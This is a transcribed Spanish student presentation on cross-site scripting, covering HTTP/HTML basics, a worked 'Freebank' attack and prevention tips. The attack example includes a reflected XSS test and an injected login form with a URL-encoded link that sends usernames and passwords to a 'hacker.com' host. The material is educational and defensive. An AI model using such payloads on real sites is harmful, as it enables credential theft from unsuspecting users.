ARE YOUR WEB VULNERABLE?

Tamaño: px
Comenzar la demostración a partir de la página:

Download "ARE YOUR WEB VULNERABLE?"

Transcripción

1 CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero

2 ÍNDICE Introducción Cross-site scripting HTTP y HTML Ataque avanzado con XSS Métodos de prevención 2 2

3 Introducción Cross-site scripting: Consiste en enmascarar el origen de la dirección web objetivo de tal manera que el atacante consigue un acceso completo a dicha web pudiendo enviar datos e información confidencial a su propio servidor. Este agujero de seguridad también es conocido como XSS. Se utiliza para obtener información de formularios. Ejemplo: Recibimos un mail con una supuesta promoción para la cual se necesitan introducir los datos de la tarjeta de crédito, datos que quedan a disposición del atacante. 3 3

4 Cross-site site Scripting Ocurre cuando se genera una página web dinámica que contiene una entrada de datos cuya validación no es la correcta. Esto permite que el atacante inserte JavaDcript malicioso dentro del código de generación de la página para ejecutarlo en las má quinas de aquellos usuarios que accedan a ellas. Afecta a cualquier página que requiera una validación de datos para acceder a ciertos servicios aunque se ven especialmente afectados los motores de búsqueda y los formularios que hay que el usuario rellena manualmente. 4 4

5 Cross-site Scripting Un ataque de XSS, ejecutado de manera correcta, permite: 1. Comprometer la confidencialidad de la información. 2. Ejecutar código malicioso sin que el usuario del recurso web pueda notificarlo. 3. Manipular o robar cookies. 4. Crear respuestas erróneas para usuarios validos. Por lo tanto y al tener una relación con el servicio de paquetes web y el buscador web de los usuarios, es necesario tener unas nociones de HTTP y HTML. 5 5

6 HTTP (Hiper Text Transfer Protocol) Es el protocolo más utilizado para la transferencia y recepción de documentos HTML a través de World Wide Web (WWW). El aspecto más importante t de este protocolo es como manejan los servidores las peticiones de los usuarios/clientes, estableciendo una conexión cliente-servidor: Cuando nuestro buscador se conecta a la red se convierte en un cliente que realiza peticiones a los servidores. Éstos se dedican a contestar todas las peticiones que les llegan. 6 6

7 HTTP (Hiper Text Transfer Protocol) En este momento se establece una conexión no estable que termina al enviarse la respuesta. Es decir, que aunque un mismo usuario realice varias consultas, estas son tratadas y respondidas independientemente, sin conseguir estabilidad en la conexión en ningún momento. Por este motivo, los ataques XSS tienen éxito, ya que una vez el servidor ha aceptado la petición y ha generado, de manera dinámica, la pagina web con la respuesta (afectada por el script malicioso) ya es demasiado tarde y, potencialmente, el daño ya esta hecho. 7 7

8 HTML (HiperText Makeup Language) Los documentos HTML son documentos de texto plano que contienen únicamente caracteres ASCII de 7 bits imprimibles. Siguen una notación basada etiquetas. Et Estas etiquetas t son interpretadas it td por el lbuscador, el cual realiza las acciones sobre el texto que se encuentra dentro de ellas. Ejemplo de documento HTML: <html> <body> <p>example of HTML document</p> <script> alert("html Document") </script> </body> </html> 8 8

9 Ataque avanzado con XSS Gran parte de las paginas web permiten a sus usuarios introducir datos para posteriormente recibir una actualización dinámica del contenido de la web basada en la entrada introducida. Por ejemplo, si se introduce en un buscador asdfghjkl como criterio de búsqueda, el servidor devuelve una página que informa de que la entrada es inválida. Esto parece ser inofensivo, pero si el buscador devuelve Nothing is found for <script>alert('aaa')</script>. éste puede interpretar que se lanza una función de alerta (con todas sus consecuencias) y, por lo tanto, el sistema puede estar en riesgo. 9 9

10 Ataque avanzado con XSS Ejemplo: FREEBANK - Se crea una página del banco Freebank y un servidor Web que recibe información obtenida durante un ataque exitoso. - El atacante busca páginas web que devuelvan información del usuario. - En este caso, el atacante encuentra información cuando el intento de identificación falla. CONTRASEÑA MAL INTRODICIDA La página muestra el nombre de usuario introducido. - El atacante sabe que se devuelve info en la página de LogIn. - Además este error se refleja en la barra de direcciones: - Invalid Login: muestra que no hay información de conexión para BadLogin - En este punto, el atacante sólo tiene que insertar su código HTML malicioso y suplantar la página web

11 Ataque avanzado con XSS 11 11

12 Ataque avanzado con XSS El atacante introduce en el nombre de usuario a line of script (sentencia de código). Afecta al código de salida de la pagina web cambiando err=invalid: Login: BadLogin to err=<script>alet('xss')</script> Si la pagina web es vulnerable, aparece el siguiente i recuadro: 12 12

13 Ataque avanzado con XSS En este momento, el atacante sabe de la vulnerabilidad y sólo le queda atacar inyectando su código malicioso, con la intención de robar el usuario y la contraseña. El código inyectado será algo así: <TABLE> <TR> <TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="217"> <FORM ACTION="login1.asp" METHOD="post"> <CENTER></form> <form action= login1.asp method= post onsubmit= XSSimage = new Image; XSSimage.src= + document.forms(1).login.value + : + document.forms(1).password.value; > <br>username:<br><input TYPE="text" NAME="login" STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR> <INPUT TYPE="password Código modificado con intenciones de robar la contraseña y el usuario

14 Ataque avanzado con XSS Tras esto, solo le queda añadirlo a la página web de la siguiente manera y esperar a las posibles víctimas: tename=prod_sel.forte&source=freebank&ad_referring_url= k.com&err=%3c/form%3e%3cform%20action=%22login1.asp%22%20method=%22po p st%22%20onsubmit=%22xssimage%20=%20new%20image;xssimage.src=' w.hacker.com/'%20%2b%20document.forms(1).login.value%20%2b%20':'%20%2b%20 document.forms(1).password.value;%22%3e Ahora, por ejemplo, puede enviar mails a los clientes del banco haciendo que estos hagan click en el link malicioso: 14 14

15 Métodos de prevención Validar los datos introducidos: Consiste en limitar los parámetros que podemos introducir en el campo que estemos usando, es decir limitarlo al uso a letras y números, permitiendo unicamente en el . Validar los datos de respuesta/salida: Es decir, crear un filtro y validar los datos de respuesta antes de devolverlos al usuario. Utilizar Bowsers : - Actualizar las vulnerabilidades bowsers que pueda tener nuestra página web e instalar parches. - Utilizar aplicaciones como HP WebInspect software para testear las posibles vulnerabilidades de nuestras aplicaciones web

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es antonio@noveria.es # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,

Más detalles

GUÍAS FÁCILES DE LAS TIC

GUÍAS FÁCILES DE LAS TIC GUÍAS FÁCILES DE LAS TIC del COLEGIO OFICIAL DE INGENIEROS DE TELECOMUNICACIÓN Trabajo Premiado 2006 Autor: La Red Internet D. Gerson Aires Casas 17 de Mayo 2006 DIA DE INTERNET GUÍAS FÁCILES DE LAS TIC

Más detalles

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ##################

################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## ################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## [~] Indice [~] 0x01 - Introducción 0x02 - Qué es XSS? 0x03 - Casos en que se presenta XSS

Más detalles

Manual Intranet Área de Sistemas

Manual Intranet Área de Sistemas Manual Intranet Área de Sistemas ManualIntranet.doc Fecha de modificación 15/01/2007 9:59:00 Página 1 de 6 1. QUE ES Y COMO FUNCIONA UNA INTRANET El centro de una Intranet es la World Wide Web. En muchos

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

GUÍA Nro. 1 TECNOLOGÍA DE INTERNET. TIII PIII

GUÍA Nro. 1 TECNOLOGÍA DE INTERNET. TIII PIII GUÍA Nro. 1 TECNOLOGÍA DE INTERNET. TIII PIII GUIA DISPONIBLE EN: http://preparadorivan.blogspot.com/ - http://preparadormssi.50webs.com/inicio.html La World Wide Web o la Web, es una de las múltiples

Más detalles

Ejemplos básicos de webmathematica para profesores

Ejemplos básicos de webmathematica para profesores Ejemplos básicos de webmathematica para profesores Cualquier cálculo hecho dentro Mathematica puede ser realizado usando webmathematica con dos limitaciones significativas. Primero, al usar webmathematica,

Más detalles

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones

Más detalles

Seguridad Informática

Seguridad Informática Universidad Rey Juan Carlos Grado en Ingeniería Informática Seguridad Informática Curso 2012/13 Prueba 3 - Seguridad en es Lea detenidamente las instrucciones del examen antes de comenzar: El examen consta

Más detalles

Servicio de Alta, Baja, Modificación y Consulta de usuarios Medusa

Servicio de Alta, Baja, Modificación y Consulta de usuarios Medusa Documentos de Proyecto Medusa Documentos de: Serie: Manuales Servicio de Alta, Baja, Modificación y Consulta del documento: Fecha 22 de febrero de 2007 Preparado por: José Ramón González Luis Aprobado

Más detalles

MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO

MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO Fecha última revisión: Junio 2011 INDICE DE CONTENIDOS HERRAMIENTA DE APROVISIONAMIENTO... 3 1. QUÉ ES LA HERRAMIENTA DE APROVISIONAMIENTO... 3 HERRAMIENTA

Más detalles

CÓMO CREAR UNA PÁGINA WEB

CÓMO CREAR UNA PÁGINA WEB CÓMO CREAR UNA PÁGINA WEB v.2 Índice 1 Introducción 3 2. Diseño gráfico 3 3. El Lenguaje HTML 3 4. Alojamiento y publicación 5 5. Promoción 8 6. Otras utilidades 9 6.1 Estadísticas 9 6.2 Contadores y Formularios

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

OFICINA VIRTUAL SIS MANUAL DE TUTOR

OFICINA VIRTUAL SIS MANUAL DE TUTOR OFICINA VIRTUAL SIS MANUAL DE TUTOR Copyright 2005 SENA - CEV Comunidad Educativa Virtual - Todos los derechos reservados. BUSCAR IMPRIMIR TABLA DE CONTENIDOS Página 1 de 22 BUSCAR IMPRIMIR TABLA DE CONTENIDOS

Más detalles

Infraestructura Tecnológica. Sesión 5: Arquitectura cliente-servidor

Infraestructura Tecnológica. Sesión 5: Arquitectura cliente-servidor Infraestructura Tecnológica Sesión 5: Arquitectura cliente-servidor Contextualización Dentro de los sistemas de comunicación que funcionan por medio de Internet podemos contemplar la arquitectura cliente-servidor.

Más detalles

Configurar cuenta de correo en Outlook 2010

Configurar cuenta de correo en Outlook 2010 Configurar cuenta de correo en Outlook 2010 Abra el programa Microsoft Outlook 2010 y siga los siguientes pasos para configurarlo: Paso 1. En el menú seleccione Archivo, ahí se encuentra en el menú de

Más detalles

15 CORREO WEB CORREO WEB

15 CORREO WEB CORREO WEB CORREO WEB Anteriormente Hemos visto cómo funciona el correo electrónico, y cómo necesitábamos tener un programa cliente (Outlook Express) para gestionar los mensajes de correo electrónico. Sin embargo,

Más detalles

Login y Password. Elección de directorios confidenciales

Login y Password. Elección de directorios confidenciales Login y Password La verdadera funcionalidad del programa tiene lugar cuando usted no tiene en su poder el ordenador donde lo instala. Por lo tanto, es importante que usted recuerde su login y password

Más detalles

Movistar Imagenio Keteké (Comunidad MoviStar) MANUAL DE USUARIO

Movistar Imagenio Keteké (Comunidad MoviStar) MANUAL DE USUARIO Keteké (Comunidad MoviStar) MANUAL DE USUARIO Versión: 1 Publicación: Mayo 2010 Este manual de servicio es propiedad de Telefónica de España SAU, queda terminante prohibida la manipulación total o parcial

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3

Más detalles

Pentesting con OWASP Zed Attack Proxy

Pentesting con OWASP Zed Attack Proxy Pentesting con OWASP Zed Attack Proxy 1. Introducción ZAP es una poderosa herramienta para realizar ataques de penetración (disciplina conocida como Pentesting), que permite analizar sitios web para buscar

Más detalles

Escudo Movistar Guía Rápida de Instalación Para Windows

Escudo Movistar Guía Rápida de Instalación Para Windows Escudo Movistar Guía Rápida de Instalación Para Windows Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3 1.2. DISPOSITIVOS

Más detalles

Manual SAAE México 2012 EMPRESAS 2012. Manual para Software de Administración de Alumnos y Egresados

Manual SAAE México 2012 EMPRESAS 2012. Manual para Software de Administración de Alumnos y Egresados EMPRESAS 2012 Manual para Software de Administración de Alumnos y Egresados 17 1. Publicar un aviso gratis Ingrese al banner Publique su aviso gratis ubicado en la página principal del portal. Inmediatamente,

Más detalles

13.2 WORLD WIDE WEB (www)

13.2 WORLD WIDE WEB (www) 13.2 WORLD WIDE WEB (www) INTRODUCCIÓN World Wide Web o simplemente web se puede traducir como la telaraña mundial, haciendo referencia al hecho de que existen multitud de servidores web distribuidos por

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

DOCENTES FORMADORES UGEL 03 PRIMARIA

DOCENTES FORMADORES UGEL 03 PRIMARIA DOCENTES FORMADORES UGEL 03 PRIMARIA 1. Recursos y Aplicaciones del Servidor La página de inicio del servidor (http://escuela) contiene los enlaces a las aplicaciones instaladas en el servidor, un enlace

Más detalles

Reflexión. Inicio. Contenido

Reflexión. Inicio. Contenido Exploradores de Internet Navegador WEb Reflexión "Una máquina puede hacer el trabajo de 50 hombres corrientes. Pero no existe ninguna máquina que pueda hacer el trabajo de un hombre extraordinario. Elbert

Más detalles

Manual de usuario investigador

Manual de usuario investigador Manual de usuario investigador Para poder solicitar un proyecto lo primero que tiene que hacer un investigador es iniciar sesión con su usuario en la web. Para ello debe pulsar en el icono situado en la

Más detalles

FUNDAMENTOS DE REDES CONCEPTOS DE LA CAPA DE APLICACIÓN

FUNDAMENTOS DE REDES CONCEPTOS DE LA CAPA DE APLICACIÓN FUNDAMENTOS DE REDES CONCEPTOS DE LA CAPA DE APLICACIÓN Mario Alberto Cruz Gartner malcruzg@univalle.edu.co Conceptos La última capa o Capa 7 del modelo OSI se denomina capa de aplicación. La capa de aplicación

Más detalles

Host. En este texto, entenderemos por host toda máquina - léase computadora. Cuenta. Una cuenta, en general, es un espacio de memoria y de disco que

Host. En este texto, entenderemos por host toda máquina - léase computadora. Cuenta. Una cuenta, en general, es un espacio de memoria y de disco que CONCEPTOS BASICOS. Usuario. Un usuario es toda persona que utilice una computadora. Host. En este texto, entenderemos por host toda máquina - léase computadora - conectada a InterNet. También se les llaman

Más detalles

Curso de PHP con MySQL Gratis

Curso de PHP con MySQL Gratis Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este

Más detalles

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN Los protocolos de capa de aplicación de TCP/IP más conocidos son aquellos que proporcionan intercambio de la información

Más detalles

Tema 1 HTTP y aplicaciones web

Tema 1 HTTP y aplicaciones web Tema 1 HTTP y aplicaciones web Indice 1. HTTP para sitios web estáticos 2. HTTP básico para aplicaciones web 3. Aplicaciones AJAX 4. APIs REST 1.1. HTTP para sitios web estáticos Petición/respuesta HTTP

Más detalles

Práctica 6 - Página Web

Práctica 6 - Página Web Práctica 6 - Página Web Teoría. Una Página Web es un recurso de información que esta diseñada para la Word Wide Web (Red Mundial) y puede ser vista por medio un Navegador Web. Esta información se encuentra

Más detalles

Visual Chart app. Guía rápida para el usuario

Visual Chart app. Guía rápida para el usuario Visual Chart app Guía rápida para el usuario Contenido 1 Introducción 2 Inicio Registro gratuito Guardar credenciales Login automático Recordar contraseña 3 Configuración Acerca de Configurar Consumo de

Más detalles

Capitulo 5. Implementación del sistema MDM

Capitulo 5. Implementación del sistema MDM Capitulo 5. Implementación del sistema MDM Una vez que se concluyeron las actividades de análisis y diseño se comenzó la implementación del sistema MDM (Manejador de Documentos de MoProSoft). En este capitulo

Más detalles

Gestión de Procesos de Compra. Documentación Técnico Comercial

Gestión de Procesos de Compra. Documentación Técnico Comercial Gestión de Procesos de Compra Gestión de Procesos de Compra Página 2 de 8 Qué es I-Compras?... 3 A quién va dirigida la aplicación I-Compras?... 3 Características generales de la aplicación... 3 Flujo

Más detalles

MANUAL DE AYUDA. SAT Móvil (Movilidad del Servicio Técnico)

MANUAL DE AYUDA. SAT Móvil (Movilidad del Servicio Técnico) MANUAL DE AYUDA SAT Móvil (Movilidad del Servicio Técnico) Fecha última revisión: Abril 2015 INDICE DE CONTENIDOS INTRODUCCION SAT Móvil... 3 CONFIGURACIONES PREVIAS EN GOTELGEST.NET... 4 1. INSTALACIÓN

Más detalles

PUBLICAR EN LA RED. Ponente: Javier Paricio Rodríguez

PUBLICAR EN LA RED. Ponente: Javier Paricio Rodríguez PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO

Más detalles

CONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su

Más detalles

Tema 4. II - Cookies. Arquitecturas Distribuidas 11/12

Tema 4. II - Cookies. Arquitecturas Distribuidas 11/12 Tema 4. II - Cookies Arquitecturas Distribuidas 11/12 1 II. Cookies 1. Necesidad de mantener información de estado y HTTP 2. Sesiones 3. Qué son las cookies? 4. Funcionamiento de cookies 5. Envío de cookies

Más detalles

TEMA 4: EMPEZANDO A NAVEGAR ESCUELA UNIVERSITARIA DE INFORMÁTICA. Raúl Martín Martín

TEMA 4: EMPEZANDO A NAVEGAR ESCUELA UNIVERSITARIA DE INFORMÁTICA. Raúl Martín Martín TEMA 4: EMPEZANDO A ESCUELA UNIVERSITARIA DE INFORMÁTICA NAVEGAR Raúl Martín Martín SERVICIOS DE INTERNET SERVICIOS DE INTERNET Las posibilidades que ofrece Internet se denominan servicios. Hoy en día,

Más detalles

Autoafiliación Banca de Personas y Empresas

Autoafiliación Banca de Personas y Empresas 1 Autoafiliación Banca de Personas y Empresas Este nuevo servicio les permite a nuestros clientes de Banca de Personas y Empresas autoafiliarse a Banesconline. A. Ingreso a BanescOnline Para poder autoafiliarse

Más detalles

Para que sea posible ganar la agilidad deseada en la gestión documental nos hace falta vuestra colaboración:

Para que sea posible ganar la agilidad deseada en la gestión documental nos hace falta vuestra colaboración: MANUAL E-COORDINA Con la finalidad de garantizar la seguridad y la salud de los trabajadores que puedan concurrir en un mismo centro de trabajo, y de asegurar el cumplimiento de la normativa en materia

Más detalles

APLICATECA. didimo Marketing. Manual de usuario. By DIDIMO Servicios Móviles. www.telefonica.es

APLICATECA. didimo Marketing. Manual de usuario. By DIDIMO Servicios Móviles. www.telefonica.es APLICATECA didimo Marketing Manual de usuario. By DIDIMO Servicios Móviles www.telefonica.es APLICATECA INDICE INDICE... 2 1 QUÉ ES DIDIMO MARKETING?... 3 2 MENÚ PRINCIPAL... 4 2.1 CAMPAÑAS... 4 2.1.1

Más detalles

Manual de Usuario: Market Interact Basic

Manual de Usuario: Market Interact Basic Manual de Usuario: Market Interact Basic La fibra no tiene competencia ÍNDICE Introducción Contactos Importación Gestión de duplicados Grupos objetivo Nuevo grupo y asociación de contactos Nuevo grupo

Más detalles

DIPLOMADO EN SEGURIDAD INFORMATICA

DIPLOMADO EN SEGURIDAD INFORMATICA DIPLOMADO EN SEGURIDAD INFORMATICA Modulo 9: Soporte Computacional Clase 9_3:Protocolos de comunicación y conectividad de arquitecturas multiplataforma. Director Programa: César Torres A Profesor : Claudio

Más detalles

INFORMÁTICA IE. Términos a conocer y conceptos básicos. World Wide Web (WWW):

INFORMÁTICA IE. Términos a conocer y conceptos básicos. World Wide Web (WWW): INFORMÁTICA IE MÓDULO INTERNET Términos a conocer y conceptos básicos World Wide Web (WWW): Digamos, simplemente, que es un sistema de información, el sistema de información propio de Internet. Sus características

Más detalles

Como crear una cuenta en PayPal?

Como crear una cuenta en PayPal? GUÍA PARA CREAR UNA CUENTA EN PAYPAL El objetivo de ésta guía es ayudar al cliente a crear una cuenta y a pagar usando este servicio gratuito que da una completa seguridad en las compras por Internet.

Más detalles

Comisión Nacional de Bancos y Seguros

Comisión Nacional de Bancos y Seguros Comisión Nacional de Bancos y Seguros Manual de Usuario Capturador de Pólizas División de Servicios a Instituciones Financieras Mayo de 2011 2 Contenido 1. Presentación... 3 1.1 Objetivo... 3 2. Descarga

Más detalles

Laboratorio 6. Creación de sitios Web - Dreamweaver

Laboratorio 6. Creación de sitios Web - Dreamweaver UNIVERSIDAD CARLOS III DE MADRID. ESCUELA DE TURISMO. Informática aplicada al sector turístico Laboratorio 6. Creación de sitios Web - Dreamweaver El objetivo de este laboratorio es aprender a crear sitios

Más detalles

Pasarela de desarrollo API DTMF (marcación por tonos).

Pasarela de desarrollo API DTMF (marcación por tonos). Pasarela de desarrollo API DTMF (marcación por tonos). La pasarela de desarrollo API DTMF (marcación por tonos) permite conectar tu vpbx con tu sistema web de datos. La pasarela de desarrollo API DTMF

Más detalles

Instrucciones de Funcionamiento del Sistema AntiVirus y AntiSpam Profesional

Instrucciones de Funcionamiento del Sistema AntiVirus y AntiSpam Profesional Instrucciones de Funcionamiento del Sistema AntiVirus y AntiSpam Profesional Si su dominio ha sido incluido en el sistema de control de AntiVirus y AntiSpam Profesional de DEINFO Servicios Informáticos

Más detalles

Control de accesos autónomo por huella dactilar

Control de accesos autónomo por huella dactilar Manual de software Control de accesos autónomo por huella dactilar Access FP (SOFTWARE PARA LECTOR DE HUELLA DACTILAR SIMON ALERT REF.: 8902003-039) (Versión de sofware 1.1) (Versión de documento 1.2)

Más detalles

CONDICIONES GENERALES DE COMPRA Y/O USO DE LA PÁGINA WEB.

CONDICIONES GENERALES DE COMPRA Y/O USO DE LA PÁGINA WEB. CONDICIONES GENERALES DE COMPRA Y/O USO DE LA PÁGINA WEB. Las presentes Condiciones Generales tienen por objeto regular el acceso y/o uso de la página web de la EDITORIAL CIUDAD NUEVA. Asimismo enumeran

Más detalles

Proyecto: Buscador de Películas usando XQuery y exist

Proyecto: Buscador de Películas usando XQuery y exist Buscador de Películas usando XQuery y exist Arquitecturas de Altas Prestaciones Rafael Martos Llavero I. Objetivo del Proyecto. El objetivo del proyecto es la creación de una base de datos basada en XML

Más detalles

Programación páginas web. Servidor (PHP)

Programación páginas web. Servidor (PHP) Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.

Más detalles

Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo?

Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo? Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo? Cómo hago llegar esta información confidencial a mis gerentes o clientes? Necesito un lugar donde

Más detalles

Escribiendo el HTML. Un formulario se declara entre estos dos tags:

Escribiendo el HTML. Un formulario se declara entre estos dos tags: Formularios Un formulario HTML sirve como principal punto de interacción con el usuario: mediante ellas, podemos hacer posible la interacción de nuestra página Web para con el usuario que visita nuestro

Más detalles

MANUAL PARA LA GESTIÓN DEL PRÉSTAMO ENTRE LAS BIBLIOTECAS DE LA RED DE LECTURA PÚBLICA DE EUSKADI

MANUAL PARA LA GESTIÓN DEL PRÉSTAMO ENTRE LAS BIBLIOTECAS DE LA RED DE LECTURA PÚBLICA DE EUSKADI MANUAL PARA LA GESTIÓN DEL PRÉSTAMO ENTRE LAS BIBLIOTECAS DE LA RED DE LECTURA PÚBLICA DE EUSKADI El presente documento recoge el procedimiento mediante el cual las bibliotecas pertenecientes a la red

Más detalles

MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO

MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO Fecha última revisión: Marzo 2016 INDICE DE CONTENIDOS HERRAMIENTA DE APROVISIONAMIENTO... 2 1. QUÉ ES LA HERRAMIENTA DE APROVISIONAMIENTO... 2 HERRAMIENTA

Más detalles

H O T E L W I N Configuración del motor de Reservas on line

H O T E L W I N Configuración del motor de Reservas on line H O T E L W I N Configuración del motor de Reservas on line Introducción Dado el enorme desarrollo de Internet en los últimos años y al sin fin de oportunidades que Internet brinda tanto a clientes como

Más detalles

Manual Oficina Web de Clubes (FBM)

Manual Oficina Web de Clubes (FBM) Manual Oficina Web de Clubes (FBM) INTRODUCCIÓN: La Oficina Web de Clubes de Intrafeb es la oficina virtual desde la que un club podrá realizar las siguientes operaciones durante la temporada: 1. Ver información

Más detalles

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)

Más detalles

El e-commerce de Grupo JAB es una herramienta que permite a los clientes del Grupo, realizar un amplio conjunto de servicios de consulta, petición y

El e-commerce de Grupo JAB es una herramienta que permite a los clientes del Grupo, realizar un amplio conjunto de servicios de consulta, petición y El de Grupo JAB es una herramienta que permite a los clientes del Grupo, realizar un amplio conjunto de servicios de consulta, petición y compra en los diversos almacenes del Grupo JAB. En concreto podremos:

Más detalles

SISTEMA DE CONTROL DE PRESENCIA

SISTEMA DE CONTROL DE PRESENCIA SISTEMA DE CONTROL DE PRESENCIA 1 SISTEMA DE CONTROL DE PRESENCIA 1 1 GENERALIDADES DE LA APLICACIÓN 3 2 SEGURIDAD Y ACCESO AL PROGRAMA 7 2.1 Mantenimiento de usuarios 7 2.2 Perfiles 9 3 GESTIÓN DE EMPRESAS

Más detalles

Guía de doble autenticación

Guía de doble autenticación Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.

Más detalles

Introducción a la plataforma Moodle Aníbal de la Torre 2006. Plataforma Moodle. Accediendo a los contenidos

Introducción a la plataforma Moodle Aníbal de la Torre 2006. Plataforma Moodle. Accediendo a los contenidos Plataforma Moodle Accediendo a los contenidos Formatos ----------------------------------------------------------------------- 2 Glosarios -----------------------------------------------------------------------

Más detalles

